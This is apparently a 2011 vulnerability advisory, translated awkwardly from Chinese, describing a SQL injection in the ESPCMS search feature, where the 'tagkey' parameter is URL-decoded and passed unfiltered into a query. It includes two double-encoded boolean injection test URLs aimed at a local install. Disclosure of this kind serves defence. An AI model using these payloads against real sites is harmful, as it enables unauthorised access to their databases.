esp cms injection 0day-vulnerability warning-the black bar safety net

2011-03-09T00:00:00
ID MYHACK58:62201129664
Type myhack58
Reporter 佚名
Modified 2011-03-09T00:00:00

Description

In urldecode() the role of the non-filtered result in injection form interface/search.php ----> in_taglist () ----> $tagkey( Urldecdoe after processing directly into SQL statement, the injection formed(code omitted

Test: http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2 5 2 7,%2527dd%2 5 2 7)%20and%2 0 1=1%2 3 http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2 5 2 7,%2527dd%2 5 2 7)%20and%2 0 1=2%2 3 Description: as with the injection statement in the SQL in the same function perform two times, and the number of fields is not the same, so the union query is blocked

Official website: http://www.ecisp.cn/html/cn/